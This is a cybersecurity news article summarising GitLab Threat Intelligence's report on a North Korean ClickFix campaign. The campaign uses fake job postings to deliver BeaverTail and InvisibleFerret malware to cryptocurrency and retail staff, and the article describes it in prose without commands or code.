Do Son 
GitLab Threat Intelligence has published a detailed analysis of a new malware campaign linked to North Korean nation-state actors, marking a tactical evolution in how groups like Contagious Interview and Famous Chollima deploy their tools. The report, authored by Oliver Smith, sheds light on shifts in targeting, distribution, and evasion techniques.
According to the report, βWeβve identified infrastructure used to distribute BeaverTail and InvisibleFerret malware variants since at least May 2025.β Unlike past campaigns that focused primarily on software developers, this one turned its attention to new industries.
βThe threat actor used ClickFix lures to target marketing and trader roles in cryptocurrency and retail sector organizations rather than targeting software development roles.β This shift suggests a broadening of objectives, likely to capture sensitive financial and operational data outside of the developer ecosystem.
Traditionally, BeaverTail has been distributed as JavaScript or Python scripts, relying on interpreters already present on target systems. However, GitLabβs research highlights a notable change: βThe threat actorβs malware was compiled into executables rather than typical distribution as scripts reliant on interpreters already present on target systems.β
This move makes the malware more portable and harder to detect, especially on systems where standard interpreters are missing. The compiled versions were also observed to have low detection rates on VirusTotal, raising concerns about their stealth and persistence.
The attack leverages the ClickFix technique, a form of social engineering where fake CAPTCHAs or troubleshooting instructions are used to trick victims into running malicious commands. The GitLab team documented how the lure was embedded into a fake hiring platform, complete with job postings for cryptocurrency traders, marketing roles, and even investment opportunities.
Visitors were prompted to record a video response during the fake application process, only to encounter fabricated technical errors that guided them into executing system-specific commands. These commands fetched and installed the BeaverTail payload, and in some cases, InvisibleFerret, a second-stage Python-based information stealer and remote access tool.
Smith and his team emphasize that the campaign is still in its early stages: βWe assess that this activity was likely being tested by the threat actor and related malware is unlikely to have been distributed at scale to date.β
Development artifacts and low prevalence in malware sandboxes suggest that operators are refining their techniques before launching wider operations.
The report concludes that this campaign represents more than just an incremental change. It signals a strategic push by North Korean operators to diversify their victim pool and strengthen their delivery mechanisms. βThe campaign suggests a slight tactical shift for a subgroup of North Korean BeaverTail operators, expanding beyond their traditional software developer targeting to pursue marketing and trading roles across cryptocurrency and retail sectors.β
Related Posts:
- North Korean APT Lazarus Uses Malicious npm Package to Target Developers
- State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
- Cyber Espionage Campaign: North Korean Actors Deploy BeaverTail and InvisibleFerret
- Developers Targeted: North Korean Hackers Deploy “BeaverTail” Malware via NFTs
- North Korean Hackers Launch Job Interview Scam to Deploy BeaverTail and InvisibleFerret Malware
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
